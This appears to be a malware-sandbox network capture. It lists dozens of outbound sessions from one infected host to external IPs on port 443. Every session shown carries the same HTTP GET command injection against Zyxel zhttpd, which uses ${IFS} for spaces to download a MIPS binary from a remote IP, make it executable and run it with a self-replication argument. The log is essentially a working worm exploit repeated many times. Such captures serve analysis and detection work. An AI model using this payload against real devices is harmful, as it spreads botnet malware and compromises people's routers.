                                    Jan 13, 2024 19:02:21.885529041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1326192.168.2.1345912126.106.37.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885562897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1327192.168.2.133918884.52.2.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885574102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1328192.168.2.1349596150.128.28.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885596037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1329192.168.2.1360904180.190.36.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885632038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1330192.168.2.1360082101.152.251.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885687113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1331192.168.2.1360810183.95.253.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885735989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1332192.168.2.1348550136.69.181.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885786057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1333192.168.2.134731697.31.82.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885821104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1334192.168.2.135655449.222.208.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885854006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1335192.168.2.1347770100.35.47.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885907888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1336192.168.2.1340916161.118.166.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885940075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1337192.168.2.1337224120.96.50.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885998011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1338192.168.2.134918831.151.62.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886063099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1339192.168.2.1350768202.141.19.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886082888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1340192.168.2.135283652.21.139.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886090040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1341192.168.2.135083614.238.42.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886131048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1342192.168.2.1347266200.181.9.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886184931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1343192.168.2.1339516165.195.125.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886209011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1344192.168.2.1348166152.228.162.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886271954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1345192.168.2.135109085.14.242.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886300087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1346192.168.2.1342010151.89.59.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886339903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1347192.168.2.135918266.235.254.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886374950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1348192.168.2.1359942149.99.243.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886413097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1349192.168.2.134882691.205.194.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886454105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1350192.168.2.1345056207.41.194.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886491060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1351192.168.2.133823673.120.184.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886548042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1352192.168.2.1338318106.13.174.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886575937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1353192.168.2.1344996148.151.185.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886609077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1354192.168.2.1354472125.43.34.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886625051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1355192.168.2.134232217.237.65.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886665106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1356192.168.2.1360438173.45.6.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886699915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1357192.168.2.1338996107.151.28.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886749983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1358192.168.2.133616679.80.151.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886785030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1359192.168.2.134686858.18.32.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886815071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1360192.168.2.135963678.145.89.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886867046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1361192.168.2.1360092223.96.68.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886893034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1362192.168.2.134915817.14.103.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886920929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1363192.168.2.1346472201.235.16.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.886951923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1364192.168.2.1337528177.51.129.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887020111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1365192.168.2.133523412.77.247.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887061119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1366192.168.2.1349200203.182.60.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887099981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1367192.168.2.1347584219.103.94.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887130022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1368192.168.2.133871849.1.29.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887187004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1369192.168.2.1353860182.255.183.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887208939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1370192.168.2.1358356119.200.247.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887234926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1371192.168.2.1346618222.207.164.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887295008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1372192.168.2.1338296161.67.90.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887326002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1373192.168.2.134562093.235.79.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887372971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1374192.168.2.1355720159.106.159.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887404919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1375192.168.2.134548294.74.32.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887424946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1376192.168.2.1350870108.122.132.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887471914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1377192.168.2.1352664148.224.104.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887532949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1378192.168.2.133441654.64.98.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887563944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1379192.168.2.1352560155.53.21.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887593031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1380192.168.2.1339286158.153.56.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887631893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1381192.168.2.1333962113.43.203.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887676954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1382192.168.2.1346806123.114.122.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887734890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1383192.168.2.1334798172.68.5.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887763977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1384192.168.2.1347660101.207.5.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887809038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1385192.168.2.134932890.131.223.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887854099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1386192.168.2.1337032184.246.17.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887913942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1387192.168.2.1352848168.213.149.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.887936115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1388192.168.2.134819636.80.134.153443
                                    TimestampBytes transferredDirectionData
